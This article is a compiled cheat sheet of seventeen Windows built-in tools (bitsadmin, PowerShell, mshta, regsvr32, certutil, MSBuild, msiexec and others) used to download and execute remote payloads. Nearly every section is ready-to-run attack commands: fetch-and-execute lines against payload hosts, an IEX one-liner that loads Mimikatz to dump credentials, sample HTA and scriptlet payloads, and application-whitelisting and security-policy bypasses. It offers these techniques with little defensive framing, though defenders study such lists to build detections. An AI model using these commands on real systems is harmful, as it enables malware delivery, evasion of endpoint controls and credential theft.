Article Abstract: This article presents a systematic compilation of methods for downloading and executing files on Windows systems using various built-in commands, including bitsadmin, PowerShell, mshta, and others. These techniques are applicable to Windows 7 and later versions.
Table of Contents
- 1. bitsadmin Command (Windows 7 and Above)
- 2. PowerShell Command Download and Execution (Windows 7 and Above)
- 3. mshta Command Download and Execution
- 4. rundll32 Command Download and Execution
- 5. regasm Command from .NET Framework
- 6. CMD Remote Command Download
- 7. regsvr32 Command Download and Execution
- 8. certutil Command Download and Execution
- 9. MSBuild Command from .NET Framework
- 10. odbcconf Command Download and Execution
- 11. cscript Script Remote Command Download and Execution
- 12. pubprn.vbs Download and Execution Command
- 13. Native Windows copy Command
- 14. IEXPLORE.EXE Command Download and Execution (Requires IE 0-day)
- 15. IEExec Command Download and Execution
- 16. msiexec Command Download and Execution
- 17. GreatSCT Download and Execution Project
1. bitsadmin Command (Windows 7 and Above)
The bitsadmin utility can only download files to a specified path on the local system.
bitsadmin /transfer myDownLoadJob /download /priority normal "http://img5.cache.netease.com/photo/0001/2013-03-28/8R1BK3QO3R710001.jpg" "d:\abc.jpg"
bitsadmin /transfer d90f <http://site.com/a> %APPDATA%\d90f.exe&%APPDATA%\d90f.exe&del %APPDATA%\d90f.exe
2. PowerShell Command Download and Execution (Windows 7 and Above)
PowerShell provides powerful capabilities for downloading and executing scripts and binaries directly from remote sources.
powershell IEX (New-Object Net.WebClient).DownloadString('<https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1>'); Invoke-Mimikatz
powershell -exec bypass -f \\webdavserver\folder\payload.ps1
powershell (new-object System.Net.WebClient).DownloadFile( 'http://192.168.168.183/1.exe','C:\1111111111111.exe')
powershell -w hidden -c (new-object System.Net.WebClient).Downloadfile('http://img5.cache.netease.com/photo/0001/2013-03-28/8R1BK3QO3R710001.jpg','d:\\1.jpg')
3. mshta Command Download and Execution
The mshta command executes HTML Application (HTA) files, which can contain VBScript or JScript that performs download and execution.
mshta vbscript:Close(Execute("GetObject(""script:http://webserver/payload.sct"")"))
mshta http://webserver/payload.hta
mshta \\webdavserver\folder\payload.hta
Sample payload.hta:
<HTML>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<HEAD>
<script language="VBScript">
Window.ReSizeTo 0, 0
Window.moveTo -2000,-2000
Set objShell = CreateObject("Wscript.Shell")
objShell.Run "calc.exe"
self.close
</script>
<body>
demo
</body>
</HEAD>
</HTML>
4. rundll32 Command Download and Execution
The rundll32 utility can execute functions exported from DLLs, including those hosted on remote WebDAV shares.
rundll32 \\webdavserver\folder\payload.dll,entrypoint
rundll32.exe javascript:"\..\mshtml,RunHTMLApplication";o=GetObject("script:http://webserver/payload.sct");window.close();
Reference: https://github.com/3gstudent/Javascript-Backdoor
5. regasm Command from .NET Framework
The regasm.exe tool, part of the .NET Framework, can be used to execute managed DLLs from remote locations.
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\regasm.exe /u \\webdavserver\folder\payload.dll
6. CMD Remote Command Download
The Windows Command Prompt can directly read and execute commands from a remote batch file.
cmd.exe /k < \\webdavserver\folder\batchfile.txt
7. regsvr32 Command Download and Execution
The regsvr32 utility can register and execute COM objects from remote scriptlet files.
regsvr32 /u /n /s /i:http://webserver/payload.sct scrobj.dll
regsvr32 /u /n /s /i:\\webdavserver\folder\payload.sct scrobj.dll
regsvr32 /u /s /i:<http://site.com/js.png> scrobj.dll
Sample js.png (Scriptlet):
<?XML version="1.0"?>
<scriptlet>
<registration
progid="ShortJSRAT"
classid="{10001111-0000-0000-0000-0000FEEDACDC}" >
<!-- Learn from Casey Smith @subTee -->
<script language="JScript">
<![CDATA[
ps = "cmd.exe /c calc.exe";
new ActiveXObject("WScript.Shell").Run(ps,0,true);
]]>
</script>
</registration>
</scriptlet>
8. certutil Command Download and Execution
The certutil utility, primarily used for certificate management, can also download files and decode Base64-encoded content.
certutil -urlcache -split -f http://webserver/payload payload
certutil -urlcache -split -f http://webserver/payload.b64 payload.b64 & certutil -decode payload.b64 payload.dll & C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil /logfile= /LogToConsole=false /u payload.dll
certutil -urlcache -split -f http://webserver/payload.b64 payload.b64 & certutil -decode payload.b64 payload.exe & payload.exe
certutil -urlcache -split -f http://site.com/a a.exe && a.exe && del a.exe && certutil -urlcache -split -f http://192.168.254.102:80/a delete
9. MSBuild Command from .NET Framework
The MSBuild tool, part of the .NET Framework, can execute tasks defined in XML project files, enabling remote code execution.
cmd /V /c "set MB="C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe" & !MB! /noautoresponse /preprocess \\webdavserver\folder\payload.xml > payload.xml & !MB! payload.xml"
10. odbcconf Command Download and Execution
The odbcconf utility can be used to register DLLs remotely via its regsvr command.
odbcconf /s /a {regsvr \\webdavserver\folder\payload_dll.txt}
11. cscript Script Remote Command Download and Execution
The cscript command executes VBScript or JScript scripts, which can be hosted remotely.
cscript //E:jscript \\webdavserver\folder\payload.txt
Sample downfile.vbs:
' Set your settings
strFileURL = "http://www.it1.net/images/it1_logo2.jpg"
strHDLocation = "c:\logo.jpg"
' Fetch the file
Set objXMLHTTP = CreateObject("MSXML2.XMLHTTP")
objXMLHTTP.open "GET", strFileURL, false
objXMLHTTP.send()
If objXMLHTTP.Status = 200 Then
Set objADOStream = CreateObject("ADODB.Stream")
objADOStream.Open
objADOStream.Type = 1 'adTypeBinary
objADOStream.Write objXMLHTTP.ResponseBody
objADOStream.Position = 0 'Set the stream position to the start
Set objFSO = Createobject("Scripting.FileSystemObject")
If objFSO.Fileexists(strHDLocation) Then objFSO.DeleteFile strHDLocation
Set objFSO = Nothing
objADOStream.SaveToFile strHDLocation
objADOStream.Close
Set objADOStream = Nothing
End if
Set objXMLHTTP = Nothing
Execution Command:
cscript downfile.vbs
12. pubprn.vbs Download and Execution Command
The pubprn.vbs script, part of Windows printing administration, can execute remote scriptlet files.
cscript /b C:\Windows\System32\Printing_Admin_Scripts\zh-CN\pubprn.vbs 127.0.0.1 script:<https://gist.githubusercontent.com/enigma0x3/64adf8ba99d4485c478b67e03ae6b04a/raw/a006a47e4075785016a62f7e5170ef36f5247cdb/test.sct>
13. Native Windows copy Command
The built-in copy and xcopy commands can copy files from remote SMB shares.
copy \\x.x.x.x\xx\poc.exe
xcopy d:\test.exe \\x.x.x.x\test.exe
14. IEXPLORE.EXE Command Download and Execution (Requires IE 0-day)
Internet Explorer can be launched from the command line to access a remote URL, potentially triggering a vulnerability.
"C:\Program Files\Internet Explorer\IEXPLORE.EXE" <http://site.com/exp>
15. IEExec Command Download and Execution
IEExec.exe, part of the .NET Framework, can execute managed code from remote locations.
C:\Windows\Microsoft.NET\Framework\v2.0.50727> caspol -s off
C:\Windows\Microsoft.NET\Framework\v2.0.50727> IEExec <http://site.com/files/test64.exe>
Reference: https://room362.com/post/2014/2014-01-16-application-whitelist-bypass-using-ieexec-dot-exe/
16. msiexec Command Download and Execution
The msiexec installer can execute MSI packages hosted on remote servers.
msiexec /q /i <http://site.com/payloads/calc.png>
17. GreatSCT Download and Execution Project
GreatSCT is a project that provides various techniques for bypassing application whitelisting and executing payloads.
Reference: https://github.com/GreatSCT
